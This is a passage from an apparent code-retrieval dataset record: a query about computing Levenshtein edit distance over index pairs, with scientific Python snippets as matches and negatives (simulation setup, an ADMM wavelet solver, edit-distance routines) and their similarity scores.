atomsc_fakevac_c.write('dataxx.ipi2_poscar',format='vasp',append=True) # works, just writes the cell it gests.\n NN_1_indices, NN_2_indices = mu.ase_get_neighborlist_1NN_2NN(atomsc_fakevac_c,atomnr=0,cutoffa=nndist,cutoffb=a0,skin=0.1)\n print('NN_1_indices (ipi ):',NN_1_indices)\n print('NN_2_indices (ipi ):',NN_2_indices)\n #print('from ....',(atomsc_fakevac_c.positions)[0])\n #for i in NN_1_indices:\n # print((atomsc_fakevac_c.positions)[i])\n\n atomsc_fakevac_cc = ase_read('dataxx.ipi2_poscar',format='vasp') # works, currently so implemented that it canges cell\n atomsc_fakevac_cc.write('dataxx.ipi2_poscar2',format='vasp',append=True)\n atomsc_fakevac_cc.write('dataxx.ipi2_poscar2_ipi',format='ipi',append=True) # works, just writes the cell it gests.\n #print('ipi cell2 (ext):',atomsc_fakevac_cc.get_cell())\n #print()\n #print('now quippy')\n atomsc_fakevac_d = ase_read('dataxx.quippy.xyz',format='quippy')\n #print('quippy cell (ext)',atomsc_fakevac_d.get_cell())\n atomsc_fakevac_d.write('dataxx.quippy.xyz2',format='quippy',append=True)\n atomsc_fakevac_d.write('dataxx.quippy.xyz2_extxyz',format='extxyz',append=True)\n NN_1_indices, NN_2_indices = mu.ase_get_neighborlist_1NN_2NN(atomsc_fakevac_d,atomnr=0,cutoffa=nndist,cutoffb=a0,skin=0.1)\n print('NN_1_indices (quippy):',NN_1_indices)\n print('NN_2_indices (quippy):',NN_2_indices)\n #print('from ....',(atomsc_fakevac_d.positions)[0])\n #for i in NN_1_indices:\n # print((atomsc_fakevac_d.positions)[i])\n path = \"/home/glensk/kmc/run_michele/Si6Mg6V1.1_/simulation.pos_libatom_2struct.xyz\"\n atomsc_fakevac_e = ase_read(path,format='quippy')\n\n NN_1_indices, NN_2_indices = mu.ase_get_neighborlist_1NN_2NN(atomsc_fakevac_e,atomnr=0,cutoffa=nndist,cutoffb=a0,skin=0.1)\n print('NN_1_indices (kmc ):',NN_1_indices)\n print('NN_2_indices (kmc ):',NN_2_indices)\n sys.exit()\n\n NN_1_indices = mu.ase_get_neighborlist(atomsc_fakevac,atomnr=0,cutoff=nndist,skin=0.1)\n NN_1_2_indices_tmp = mu.ase_get_neighborlist(atomsc_fakevac,atomnr=0,cutoff=a0,skin=0.1)\n print('NN_1_indices :',NN_1_indices)\n NN_2_indices = np.sort(np.array(mu.diff(NN_1_2_indices_tmp,NN_1_indices)))\n print('NN_2_indices :',NN_2_indices)\n NN_1_2_indices = np.concatenate((NN_1_indices, NN_2_indices ))\n print('NN_1_2_indices:',NN_1_2_indices)\n\n\n # fill only 1NN (with one species)\n for i in [ 'Mg', 'Si' ]:\n atomsc_fakevac = mu.get_ase_atoms_object_kmc_al_si_mg_vac(ncell=5,nsi=0,nmg=0,nvac=1,a0=a0,cubic=False,create_fake_vacancy = True,normal_ordering=\"XX_0\")\n mysave_quippy_xyz(atomsc_fakevac,text=\"1NN\")\n for ii in NN_1_indices:\n atomsc_fakevac[ii].symbol = i\n mysave_quippy_xyz(atomsc_fakevac,text=\"1NN\")\n\n # fill only 2NN (with one species)\n for i in [ 'Mg', 'Si' ]:\n atomsc_fakevac = mu.get_ase_atoms_object_kmc_al_si_mg_vac(ncell=5,nsi=0,nmg=0,nvac=1,a0=a0,cubic=False,create_fake_vacancy = True,normal_ordering=\"XX_0\")\n mysave_quippy_xyz(atomsc_fakevac,text=\"2NN\")\n for ii in NN_2_indices:\n atomsc_fakevac[ii].symbol = i\n mysave_quippy_xyz(atomsc_fakevac,text=\"2NN\")\n\n # fill 1NN and 2NN (with one species)\n for i in [ 'Mg', 'Si' ]:\n atomsc_fakevac = mu.get_ase_atoms_object_kmc_al_si_mg_vac(ncell=5,nsi=0,nmg=0,nvac=1,a0=a0,cubic=False,create_fake_vacancy = True,normal_ordering=\"XX_0\")\n mysave_quippy_xyz(atomsc_fakevac,text=\"1and2NN\")\n for ii in NN_1_2_indices:\n atomsc_fakevac[ii].symbol = i\n mysave_quippy_xyz(atomsc_fakevac,text=\"1and2NN\")\n\n # dif compositions in 1NN shell\n filling = [ 2,4,6,8,10]\n for fi in filling:\n atomsc_fakevac = mu.get_ase_atoms_object_kmc_al_si_mg_vac(ncell=5,nsi=0,nmg=0,nvac=1,a0=a0,cubic=False,create_fake_vacancy = True,normal_ordering=\"XX_0\")\n mysave_quippy_xyz(atomsc_fakevac,text=\"1NN_diffcomp\")\n for idx,ii in enumerate(NN_1_indices):\n if idx < fi: ch = \"Mg\"\n else: ch = \"Si\"\n atomsc_fakevac[ii].symbol = ch\n mysave_quippy_xyz(atomsc_fakevac,text=\"1NN_diffcomp\")\n\n\n sys.exit()\n\n #mu.ase_get_known_formats(show=True, add_missing_formats=False, copy_formats=False, verbose=False,show_formatspy=True)\n for i in [ 'Mg', 'Si' ]:\n for ii in [ 0,1,2,3,4,5]:\n atomsc_fakevac = mu.get_ase_atoms_object_kmc_al_si_mg_vac(ncell=5,nsi=0,nmg=0,nvac=1,a0=a0,cubic=False,create_fake_vacancy = True,normal_ordering=i+'_'+str(ii))\n\n\n sys.exit()\n\n\n # show the input variables\n print('--------------------------- check the input --------------------------------')\n print('JOBS (nseeds) ',nseeds,'(defined by -nseeds / or -seeds)')\n print('seeds ',seeds)\n print('nsteps ',nsteps)\n print()\n print('ncell ',ncell,\"(\",atomsc.get_number_of_atoms(),\"atoms )\")\n print('nsi ',nsi, \"(\",pcsi,\"at%)\")\n print('nmg ',nmg,\"(\",pcmg,\"at%)\")\n print('nvac ',nvac,\"(\",pcvac,\"at%)\")\n print('a0 ',a0,\"angstrom\")\n print('temp ',temp,\"K\")\n print()\n print('mypot.pot ',mypot.pot)\n print('mypot.potpath ',mypot.potpath)\n print()\n print('directory ',directory)\n print('submit ',submit)\n print('submitdebug ',submitdebug)\n print()\n print('nodes ',nodes)\n print('ffsocket ',ffsocket)\n #print('python ver ',sys.version_info[0])\n #print()\n print('--------------------------- check the input --------------------------------')\n if submit == True or submitdebug == True:\n mu.get_from_prompt_Yy_orexit(\"Are the ine input variables ok? [y]es: \")\n\n # make the directory\n if os.path.isdir(directory):\n mu.get_from_prompt_Yy_orexit(\"This main directory exists already, shall I add jobs? [y]es: \")\n mu.mkdir(directory)\n\n # create README.md\n IPI_COMMAND = os.environ[\"IPI_COMMAND\"]\n LAMMPS_COMMAND = os.environ[\"LAMMPS_COMMAND\"]\n mu.create_READMEtxt(directory,add=[\"# to start manually (1): python \"+IPI_COMMAND+\" input-runner.xml\",\"# to start manually (2):\"+LAMMPS_COMMAND+\" < in.lmp\"])\n\n for seed in seeds:\n\n # make jobdirectory\n jobdir = directory+'/seed'+str(seed)\n print('jobdir',jobdir)\n if os.path.exists(jobdir):\n sys.exit(\"jobdirectory \"+str(jobdir)+\" already exists!\")\n mu.mkdir(jobdir)\n\n # get data.lmp and data.ipi\n atomsc.write(jobdir+'/data.runnerformat.lmp',format='lammps-runner')\n atomsc_fakevac.write(jobdir+'/data.ipi',format='ipi')\n atomsc_fakevac.write(jobdir+'/data.extxyz',format='extxyz')\n #atomsc_fakevac.write(jobdir+'/data_fakevac.ipi',format='ipi')\n\n if testfiles == True:\n atomsc.write(jobdir+'/data.lmp',format='lammps-data')\n atomsc.write(jobdir+'/data.POSCAR',format='vasp')\n atomsc.write(jobdir+'/data.xyz',format='xyz')\n atomsc.write(jobdir+'/data.extxyz',format='extxyz')\n atomsc.write(jobdir+'/data.espresso-in',format='espresso-in')\n\n # create in.lmp\n ace = mu.ase_calculate_ene(pot=pot,potpath=mypot.potpath,\n units='eV',geopt=False,kmc=True,verbose=verbose)\n address = socket.gethostname()+\"_\"+os.path.basename(jobdir)\n print('address',address)\n ace.pot_get_and_ase_lmp_cmd(kmc=True,temp=temp,nsteps=nsteps,ffsocket=ffsocket,address=address)\n mu.lammps_write_inputfile(folder=jobdir,filename='in.lmp',positions='data.runnerformat.lmp',ace=ace)\n\n # create input-runner.xml (should be made without copying)\n mu.create_ipi_kmc_inputfile(jobdir,filename=\"input-runner.xml\",nsteps=nsteps,stride=100,seed=seed,a0=a0,ncell=ncell,nsi=nsi,nmg=nmg,nvac=nvac,neval=neval,temp=temp,nodes=nodes,address=address,testrun=test,cubic=args.cubic)\n\n # create submit-ipi-kmc.sh (should be made without copying)\n mu.create_submitskript_ipi_kmc(jobdir+\"/submit-ipi-kmc.sh\",nodes,ntasks,\n lmp_par=lmp_par,\n ipi_inst=ipi_inst,\n ffsocket=ffsocket,\n submittime_hours=submittime_hours,\n SBATCH=True)\n\n # create osubmit-ipi-kmc.sh (should be made without copying)\n mu.create_submitskript_ipi_kmc(jobdir+\"/osubmit-ipi-kmc.sh\",nodes,ntasks,\n lmp_par=lmp_par,\n ipi_inst=ipi_inst,\n ffsocket=ffsocket,\n submittime_hours=submittime_hours,\n SBATCH=False)\n\n # submit the job (execute either this or submit-ipi-kmc.sh_all3, not both)\n #mu.submitjob(submit=submit,submitdebug=submitdebug,jobdir=jobdir,submitskript=\"submit-ipi-kmc.sh\")\n\n # get submit-ipi-kmc.sh_all3 (should be made without copying)\n if nseeds == 3:\n mu.create_submitskript_ipi_kmc(directory+\"/submit-ipi-kmc.sh_all3\",nodes,ntasks,\n lmp_par=lmp_par,\n ipi_inst=ipi_inst,\n ffsocket=ffsocket,\n submittime_hours=submittime_hours,\n SBATCH=True,\n LOOPFOLDER=True)\n\n # submit the job (execute either this or submit-ipi-kmc.sh_all3, not both)\n #mu.submitjob(submit=submit,submitdebug=submitdebug,jobdir=directory,submitskript=\"submit-ipi-kmc.sh_all3\")\n if submit == True:\n mu.submitjob(submit_to_que=True,submit_to_debug_que=False,jobdir=directory,submitskript=\"submit-ipi-kmc.sh_all3\")\n\n\n print('done')\n return", "def solve_l1(y, A_fun, AT_fun, lambda_l1, reshape_img_fun, show_img_progress=False, alpha=0.2, max_iter=100, solver_tol=1e-6):\n\n\n obj_lss = np.zeros(max_iter)\n x_zs = np.zeros(max_iter)\n u_norms = np.zeros(max_iter)\n times = np.zeros(max_iter)\n\n ATy = AT_fun(y)\n x_shape = ATy.shape\n d = np.prod(x_shape)\n\n def A_cgs_fun(x):\n x = np.reshape(x, x_shape, order='F')\n y = AT_fun(A_fun(x)) + alpha * x\n return vec(y)\n A_cgs = LinearOperator((d,d), matvec=A_cgs_fun, dtype='float')\n\n def compute_p_inv_A(b, z0):\n (z,info) = sp.sparse.linalg.cgs(A_cgs, vec(b), x0=vec(z0), tol=1e-3, maxiter=100)\n if info > 0:\n print('cgs convergence to tolerance not achieved')\n elif info <0:\n print('cgs gets illegal input or breakdown')\n z = np.reshape(z, x_shape, order='F')\n return z\n\n\n def A_cgs_fun_init(x):\n x = np.reshape(x, x_shape, order='F')\n y = AT_fun(A_fun(x))\n return vec(y)\n A_cgs_init = LinearOperator((d,d), matvec=A_cgs_fun_init, dtype='float')\n\n def compute_init(b, z0):\n (z,info) = sp.sparse.linalg.cgs(A_cgs_init, vec(b), x0=vec(z0), tol=1e-2)\n if info > 0:\n print('cgs convergence to tolerance not achieved')\n elif info <0:\n print('cgs gets illegal input or breakdown')\n z = np.reshape(z, x_shape, order='F')\n return z\n\n # initialize z and u\n z = compute_init(ATy, ATy)\n u = np.zeros(x_shape)\n\n\n plot_normalozer = matplotlib.colors.Normalize(vmin=0.0, vmax=1.0, clip=True)\n\n\n start_time = timeit.default_timer()\n\n for iter in range(max_iter):\n\n # x-update\n net_input = z+u\n Wzu, wbook = wavelet_transform(net_input)\n q = soft_threshold(Wzu, lambda_l1/alpha)\n x = inverse_wavelet_transform(q, wbook, x_shape)\n x = np.reshape(x, x_shape)\n\n # z-update\n b = ATy + alpha * (x - u)\n z = compute_p_inv_A(b, z)\n\n # u-update\n u += z - x;\n\n if show_img_progress == True:\n\n fig = plt.figure('current_sol')\n plt.gcf().clear()\n fig.canvas.set_window_title('iter %d' % iter)\n plt.subplot(1,3,1)\n plt.imshow(reshape_img_fun(np.clip(x, 0.0, 1.0)), interpolation='nearest', norm=plot_normalozer)\n plt.title('x')\n plt.subplot(1,3,2)\n plt.imshow(reshape_img_fun(np.clip(z, 0.0, 1.0)), interpolation='nearest', norm=plot_normalozer)\n plt.title('z')\n plt.subplot(1,3,3)\n plt.imshow(reshape_img_fun(np.clip(net_input, 0.0, 1.0)), interpolation='nearest', norm=plot_normalozer)\n plt.title('netin')\n plt.pause(0.00001)\n\n\n obj_ls = 0.5 * np.sum(np.square(y - A_fun(x)))\n x_z = np.sqrt(np.mean(np.square(x-z)))\n u_norm = np.sqrt(np.mean(np.square(u)))\n\n print('iter = %d: obj_ls = %.3e |x-z| = %.3e u_norm = %.3e' % (iter, obj_ls, x_z, u_norm))\n\n\n obj_lss[iter] = obj_ls\n x_zs[iter] = x_z\n u_norms[iter] = u_norm\n times[iter] = timeit.default_timer() - start_time\n\n if x_z < solver_tol:\n break\n\n infos = {'obj_lss': obj_lss, 'x_zs': x_zs, 'u_norms': u_norms,\n 'times': times, 'alpha':alpha, 'lambda_l1':lambda_l1,\n 'max_iter':max_iter, 'solver_tol':solver_tol}\n\n\n return (x, z, u, infos)", "def ExecuteInstanceStochasticAdaptiveRefinementAux_Functionality(current_global_index,pickled_coarse_model,pickled_coarse_project_parameters,pickled_custom_metric_refinement_parameters,pickled_custom_remesh_refinement_parameters,random_variable,current_index,current_analysis_stage,previous_computational_time,open_mp_threads,mapping_flag,pickled_mapping_reference_model,print_to_file,filename):\n\n start_time = time.time()\n # unpickle model and build Kratos Model object\n serialized_model = pickle.loads(pickled_coarse_model)\n current_model = KratosMultiphysics.Model()\n serialized_model.Load(\"ModelSerialization\",current_model)\n del(serialized_model)\n # unpickle parameters and build Kratos Parameters object\n serialized_project_parameters = pickle.loads(pickled_coarse_project_parameters)\n current_project_parameters = KratosMultiphysics.Parameters()\n serialized_project_parameters.Load(\"ParametersSerialization\",current_project_parameters)\n del(serialized_project_parameters)\n # refine if current current_global_index > 0, adaptive refinement based on the solution of previous index\n if (current_index > 0):\n # unpickle metric and remesh refinement parameters and build Kratos Parameters objects\n serialized_custom_metric_refinement_parameters = pickle.loads(pickled_custom_metric_refinement_parameters)\n serialized_custom_remesh_refinement_parameters = pickle.loads(pickled_custom_remesh_refinement_parameters)\n current_custom_metric_refinement_parameters = KratosMultiphysics.Parameters()\n current_custom_remesh_refinement_parameters = KratosMultiphysics.Parameters()\n serialized_custom_metric_refinement_parameters.Load(\"MetricRefinementParametersSerialization\",current_custom_metric_refinement_parameters)\n serialized_custom_remesh_refinement_parameters.Load(\"RemeshRefinementParametersSerialization\",current_custom_remesh_refinement_parameters)\n del(serialized_custom_metric_refinement_parameters,serialized_custom_remesh_refinement_parameters)\n # refine the model Kratos object\n adaptive_refinement_manager = AdaptiveRefinement(current_index,current_model,current_project_parameters,current_custom_metric_refinement_parameters,current_custom_remesh_refinement_parameters)\n refined_model,refined_project_parameters = adaptive_refinement_manager.ComputeAdaptiveRefinement()\n current_model = refined_model\n del(refined_model,refined_project_parameters)\n # constructor analysis stage\n simulation = current_analysis_stage(current_model,current_project_parameters,random_variable)\n # add filename flag print_to_file is true\n if (print_to_file):\n simulation.filename = filename\n # add flag if current index is maximum index\n if (current_index == current_global_index):\n simulation.is_current_index_maximum_index = True\n else:\n simulation.is_current_index_maximum_index = False\n # mapping if in current finest level and mapping flag is true\n # otherwise standard behavior\n if (mapping_flag is True and current_index == current_global_index):\n # unpickle mapping reference model and build Kratos Model object\n serialized_mapping_reference_model = pickle.loads(pickled_mapping_reference_model)\n mapping_reference_model = KratosMultiphysics.Model()\n serialized_mapping_reference_model.Load(\"ModelSerialization\",mapping_reference_model)\n del(serialized_mapping_reference_model)\n # send reference model to analysis stage for mapping and set mapping flag to true\n simulation.mapping_reference_model = mapping_reference_model\n simulation.mapping = True\n simulation.Run()\n # mapping if in current finest level and mapping flag is true\n # otherwise standard qoi evaluation\n if (mapping_flag is True and current_index == current_global_index):\n qoi = simulation.MappingAndEvaluateQuantityOfInterest()\n else:\n qoi = simulation.EvaluateQuantityOfInterest()\n # save model and parameters as MpiSerializer Kratos objects\n serialized_finer_model = KratosMultiphysics.MpiSerializer()\n serialized_finer_model.Save(\"ModelSerialization\",simulation.model)\n # pickle model and parameters\n pickled_finer_model = pickle.dumps(serialized_finer_model, 2) # second argument is the protocol and is NECESSARY (according to pybind11 docs)\n del(simulation)\n end_time = time.time()\n computational_time = previous_computational_time + open_mp_threads*(end_time-start_time) # multiply by open mp threads to consider real machine cost\n return qoi,pickled_finer_model,computational_time", "def parallelized_threading(name, dico_aligns, dope_arr, index_aa):\n ev_threading = sc.Threading(dico_aligns[name])\n return (name, ev_threading.threaded(dope_arr, index_aa))", "def reduce_nb(a, reduce_func_nb, *args):\n out = np.full(a.shape[1], np.nan, dtype=np.float_)\n\n for col in range(a.shape[1]):\n out[col] = reduce_func_nb(col, a[:, col], *args)\n return out" ]
[ "0.65683377", "0.61231744", "0.61210066", "0.58272725", "0.58008033", "0.57025033", "0.56774867", "0.565421", "0.5610815", "0.5579183", "0.5561648", "0.5541063", "0.552428", "0.54533285", "0.5434301", "0.5418918", "0.5369601", "0.5330608", "0.52911884", "0.5281962", "0.5195514", "0.51942545", "0.5192588", "0.5172473", "0.5143275", "0.5107227", "0.5086616", "0.50838035", "0.50819606", "0.5070131", "0.50480384", "0.50349545", "0.5023571", "0.4985677", "0.49501696", "0.49332353", "0.489361", "0.4874437", "0.4874437", "0.48727936", "0.4854548", "0.48459977", "0.48438382", "0.4828254", "0.48235548", "0.4817116", "0.48142642", "0.48078787", "0.48063615", "0.47954836", "0.47952983", "0.4779901", "0.47657928", "0.47614145", "0.47402304", "0.47285813", "0.4727023", "0.47232905", "0.47220314", "0.47200912", "0.4702508", "0.4702322", "0.46876773", "0.4683725", "0.46806893", "0.46769854", "0.46747023", "0.46669236", "0.4656495", "0.4646575", "0.4645698", "0.4644609", "0.4640612", "0.46382976", "0.46382555", "0.46347043", "0.46222973", "0.4621476", "0.46167004", "0.46151206", "0.4613143", "0.4613047", "0.4610823", "0.46081734", "0.46072897", "0.4606967", "0.4606649", "0.46056393", "0.46050113", "0.45878655", "0.45859998", "0.45846683", "0.45830503", "0.45798513", "0.4577831", "0.4576468", "0.45697027", "0.45663613", "0.45614323", "0.4560821", "0.45588028" ]
0.0
-1
Computes the Levenshtein edit distance for sequences in seqs_mat indicated by pairs of indices.
def nb_vector_editdistance(indices, seqs_mat, seqs_L, distance_matrix=identity_nb_distance_matrix, gap_penalty=1): #print(indices.shape) #print(seqs_mat.shape) #print(seqs_L.shape) return _nb_vector_editdistance(indices, seqs_mat, seqs_L, distance_matrix, gap_penalty)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _nb_vector_editdistance(indices, seqs_mat, seqs_L, distance_matrix=identity_nb_distance_matrix, gap_penalty=1):\n assert seqs_mat.shape[0] == seqs_L.shape[0]\n mx_L = nb.int_(np.max(seqs_L))\n\n dist = np.zeros(indices.shape[0], dtype=np.int16)\n \n \"\"\"As long as ldmat is big enough to accomodate the largest sequence\n its OK to only use part of it for the smaller sequences\n NOTE that to create a 2D array it must be created 1D and reshaped\"\"\"\n ldmat = np.zeros(mx_L * mx_L, dtype=np.int16).reshape((mx_L, mx_L))\n for ind_i in nb.prange(indices.shape[0]):\n query_i = indices[ind_i, 0]\n seq_i = indices[ind_i, 1]\n \n q_L = seqs_L[query_i]\n s_L = seqs_L[seq_i]\n if q_L == s_L:\n \"\"\"No gaps: substitution distance\n This will make it differ from a strict edit-distance since\n the optimal edit-distance may insert same number of gaps in both sequences\"\"\"\n #tmp_dist = 0\n for i in range(q_L):\n dist[ind_i] += distance_matrix[seqs_mat[query_i, i], seqs_mat[seq_i, i]]\n #dist[ind_i] = tmp_dist\n continue\n \n \"\"\"Do not need to re-zero each time\"\"\"\n # ldmat = np.zeros((q_L, s_L), dtype=np.int16)\n for row in range(1, q_L):\n ldmat[row, 0] = row * gap_penalty\n\n for col in range(1, s_L):\n ldmat[0, col] = col * gap_penalty\n \n for col in range(1, s_L):\n for row in range(1, q_L):\n ldmat[row, col] = min(ldmat[row-1, col] + gap_penalty,\n ldmat[row, col-1] + gap_penalty,\n ldmat[row-1, col-1] + distance_matrix[seqs_mat[query_i, row-1], seqs_mat[seq_i, col-1]]) # substitution\n dist[ind_i] = ldmat[row, col]\n return dist", "def nb_editdistance(seq_vec1, seq_vec2, distance_matrix=identity_nb_distance_matrix, gap_penalty=1):\n \n q_L = seq_vec1.shape[0]\n s_L = seq_vec2.shape[0]\n if q_L == s_L:\n \"\"\"No gaps: substitution distance\n This will make it differ from a strict edit-distance since\n the optimal edit-distance may insert same number of gaps in both sequences\"\"\"\n dist = 0\n for i in range(q_L):\n dist += distance_matrix[seq_vec1[i], seq_vec2[i]]\n return dist\n\n ldmat = np.zeros((q_L, s_L), dtype=np.int16)\n for row in range(1, q_L):\n ldmat[row, 0] = row * gap_penalty\n\n for col in range(1, s_L):\n ldmat[0, col] = col * gap_penalty\n \n for col in range(1, s_L):\n for row in range(1, q_L):\n ldmat[row, col] = min(ldmat[row-1, col] + gap_penalty,\n ldmat[row, col-1] + gap_penalty,\n ldmat[row-1, col-1] + distance_matrix[seq_vec1[row-1], seq_vec2[col-1]]) # substitution\n return ldmat[row, col]", "def levenshteinDistance(s1, s2):\n singleLetterMapping = {DOWNLEFT: '1', DOWN:'2', DOWNRIGHT:'3',\n LEFT:'4', RIGHT:'6',\n UPLEFT:'7', UP:'8', UPRIGHT:'9'}\n\n len1 = len([singleLetterMapping[letter] for letter in s1])\n len2 = len([singleLetterMapping[letter] for letter in s2])\n\n matrix = list(range(len1 + 1)) * (len2 + 1)\n for i in range(len2 + 1):\n matrix[i] = list(range(i, i + len1 + 1))\n for i in range(len2):\n for j in range(len1):\n if s1[j] == s2[i]:\n matrix[i+1][j+1] = min(matrix[i+1][j] + 1, matrix[i][j+1] + 1, matrix[i][j])\n else:\n matrix[i+1][j+1] = min(matrix[i+1][j] + 1, matrix[i][j+1] + 1, matrix[i][j] + 1)\n return matrix[len2][len1]", "def edit_distance_between_seqs(seq1, seq2):\n aln1, aln2 = needleman_wunsch(seq1, seq2)\n return edit_distance_from_aln_strings(aln1, aln2)", "def _nb_vector_tcrdist(indices, seqs_mat, seqs_L, distance_matrix=tcr_nb_distance_matrix, dist_weight=3, gap_penalty=4, ntrim=3, ctrim=2, fixed_gappos=True):\n assert seqs_mat.shape[0] == seqs_L.shape[0]\n\n dist = np.zeros(indices.shape[0], dtype=np.int16)\n for ind_i in nb.prange(indices.shape[0]):\n query_i = indices[ind_i, 0]\n seq_i = indices[ind_i, 1]\n q_L = seqs_L[query_i]\n s_L = seqs_L[seq_i]\n if q_L == s_L:\n \"\"\"No gaps: substitution distance\"\"\"\n for i in range(ntrim, q_L - ctrim):\n dist[ind_i] += distance_matrix[seqs_mat[query_i, i], seqs_mat[seq_i, i]] * dist_weight\n continue\n\n short_len = min(q_L, s_L)\n len_diff = abs(q_L - s_L)\n if fixed_gappos:\n min_gappos = min(6, 3 + (short_len - 5) // 2)\n max_gappos = min_gappos\n else:\n min_gappos = 5\n max_gappos = short_len - 1 - 4\n while min_gappos > max_gappos:\n min_gappos -= 1\n max_gappos += 1\n min_dist = -1\n # min_count = -1\n for gappos in range(min_gappos, max_gappos + 1):\n tmp_dist = 0\n # tmp_count = 0\n remainder = short_len - gappos\n for n_i in range(ntrim, gappos):\n \"\"\"n_i refers to position relative to N term\"\"\"\n # print (n_i, shortseq[i], longseq[i], distance_matrix[shortseq[i]+longseq[i]])\n tmp_dist += distance_matrix[seqs_mat[query_i, n_i], seqs_mat[seq_i, n_i]]\n # tmp_count += 1\n #print('sequence_distance_with_gappos1:', gappos, remainder, dist[seq_i])\n for c_i in range(ctrim, remainder):\n \"\"\"c_i refers to position relative to C term, counting upwards from C term\"\"\"\n tmp_dist += distance_matrix[seqs_mat[query_i, q_L - 1 - c_i], seqs_mat[seq_i, s_L - 1 - c_i]]\n # tmp_count += 1\n #print('sequence_distance_with_gappos2:', gappos, remainder, dist[seq_i])\n if tmp_dist < min_dist or min_dist == -1:\n min_dist = tmp_dist\n # min_count = tmp_count\n if min_dist == 0:\n break\n dist[ind_i] = min_dist * dist_weight + len_diff * gap_penalty\n return dist", "def iterative_levenshtein(s, t):\n rows = len(s)+1\n cols = len(t)+1\n dist = [[0 for x in range(cols)] for x in range(rows)]\n # source prefixes can be transformed into empty strings \n # by deletions:\n for i in range(1, rows):\n dist[i][0] = i\n # target prefixes can be created from an empty source string\n # by inserting the characters\n for i in range(1, cols):\n dist[0][i] = i\n \n for col in range(1, cols):\n for row in range(1, rows):\n if s[row-1] == t[col-1]:\n cost = 0\n else:\n cost = 1\n dist[row][col] = min(dist[row-1][col] + 1, # deletion\n dist[row][col-1] + 1, # insertion\n dist[row-1][col-1] + cost) # substitution\n #for r in range(rows):\n #print(dist[r])\n \n \n return dist[row][col]", "def dameraulevenshtein(seq1, seq2):\n # Conceptually, this is based on a len(seq1) + 1 * len(seq2) + 1 matrix.\n # However, only the current and two previous rows are needed at once,\n # so we only store those.\n oneago = None\n thisrow = list(range(1, len(seq2) + 1)) + [0]\n for x in range(len(seq1)):\n # Python lists wrap around for negative indices, so put the\n # leftmost column at the *end* of the list. This matches with\n # the zero-indexed strings and saves extra calculation.\n twoago, oneago, thisrow = oneago, thisrow, [0] * len(seq2) + [x + 1]\n for y in range(len(seq2)):\n delcost = oneago[y] + 1\n addcost = thisrow[y - 1] + 1\n subcost = oneago[y - 1] + (seq1[x] != seq2[y])\n thisrow[y] = min(delcost, addcost, subcost)\n # This block deals with transpositions\n if (x > 0 and y > 0 and seq1[x] == seq2[y - 1]\n and seq1[x-1] == seq2[y] and seq1[x] != seq2[y]):\n thisrow[y] = min(thisrow[y], twoago[y - 2] + 1)\n return thisrow[len(seq2) - 1]", "def dameraulevenshtein(seq1, seq2):\n # codesnippet:D0DE4716-B6E6-4161-9219-2903BF8F547F\n # Conceptually, this is based on a len(seq1) + 1 * len(seq2) + 1 matrix.\n # However, only the current and two previous rows are needed at once,\n # so we only store those.\n oneago = None\n thisrow = list(range(1, len(seq2) + 1)) + [0]\n for x in range(len(seq1)):\n # Python lists wrap around for negative indices, so put the\n # leftmost column at the *end* of the list. This matches with\n # the zero-indexed strings and saves extra calculation.\n twoago, oneago, thisrow = (oneago, thisrow, [0] * len(seq2) + [x + 1])\n for y in range(len(seq2)):\n delcost = oneago[y] + 1\n addcost = thisrow[y - 1] + 1\n subcost = oneago[y - 1] + (seq1[x] != seq2[y])\n thisrow[y] = min(delcost, addcost, subcost)\n # This block deals with transpositions\n if (x > 0 and y > 0 and seq1[x] == seq2[y - 1]\n and seq1[x - 1] == seq2[y] and seq1[x] != seq2[y]):\n thisrow[y] = min(thisrow[y], twoago[y - 2] + 1)\n return thisrow[len(seq2) - 1]", "def dameraulevenshtein(seq1, seq2):\n # codesnippet:D0DE4716-B6E6-4161-9219-2903BF8F547F\n # Conceptually, this is based on a len(seq1) + 1 * len(seq2) + 1 matrix.\n # However, only the current and two previous rows are needed at once,\n # so we only store those.\n oneago = None\n thisrow = list(range(1, len(seq2) + 1)) + [0]\n for x in range(len(seq1)):\n # Python lists wrap around for negative indices, so put the\n # leftmost column at the *end* of the list. This matches with\n # the zero-indexed strings and saves extra calculation.\n twoago, oneago, thisrow = (oneago, thisrow, [0] * len(seq2) + [x + 1])\n for y in range(len(seq2)):\n delcost = oneago[y] + 1\n addcost = thisrow[y - 1] + 1\n subcost = oneago[y - 1] + (seq1[x] != seq2[y])\n thisrow[y] = min(delcost, addcost, subcost)\n # This block deals with transpositions\n if (x > 0 and y > 0 and seq1[x] == seq2[y - 1]\n and seq1[x - 1] == seq2[y] and seq1[x] != seq2[y]):\n thisrow[y] = min(thisrow[y], twoago[y - 2] + 1)\n return thisrow[len(seq2) - 1]", "def dameraulevenshtein(self, seq1, seq2):\n # codesnippet:D0DE4716-B6E6-4161-9219-2903BF8F547F\n # Conceptually, this is based on a len(seq1) + 1 * len(seq2) + 1 matrix.\n # However, only the current and two previous rows are needed at once,\n # so we only store those.\n oneago = None\n thisrow = range(1, len(seq2) + 1) + [0]\n for x in xrange(len(seq1)):\n # Python lists wrap around for negative indices, so put the\n # leftmost column at the *end* of the list. This matches with\n # the zero-indexed strings and saves extra calculation.\n twoago, oneago, thisrow = oneago, thisrow, [0] * len(seq2) + [x + 1]\n for y in xrange(len(seq2)):\n delcost = oneago[y] + 1\n addcost = thisrow[y - 1] + 1\n subcost = oneago[y - 1] + (seq1[x] != seq2[y])\n thisrow[y] = min(delcost, addcost, subcost)\n # This block deals with transpositions\n if (x > 0 and y > 0 and seq1[x] == seq2[y - 1]\n and seq1[x-1] == seq2[y] and seq1[x] != seq2[y]):\n thisrow[y] = min(thisrow[y], twoago[y - 2] + 1)\n return thisrow[len(seq2) - 1]", "def edit_distance(s1, s2, transpositions=False):\r\n # set up a 2-D array\r\n len1 = len(s1)\r\n len2 = len(s2)\r\n lev = _edit_dist_init(len1 + 1, len2 + 1)\r\n\r\n # iterate over the array\r\n for i in range(len1):\r\n for j in range(len2):\r\n _edit_dist_step(lev, i + 1, j + 1, s1, s2, transpositions=transpositions)\r\n return lev[len1][len2]", "def _pairwise_dist(self,seq1,seq2):\n \n return jf.damerau_levenshtein_distance(str(seq1), str(seq2))", "def minimum_edit_distance(seq1,seq2):\n if len(seq1) > len(seq2):\n seq1,seq2 = seq2,seq1\n distances = range(len(seq1) + 1)\n for index2,char2 in enumerate(seq2):\n newDistances = [index2+1]\n for index1,char1 in enumerate(seq1):\n if char1 == char2:\n newDistances.append(distances[index1])\n else:\n newDistances.append(1 + min((distances[index1],\n 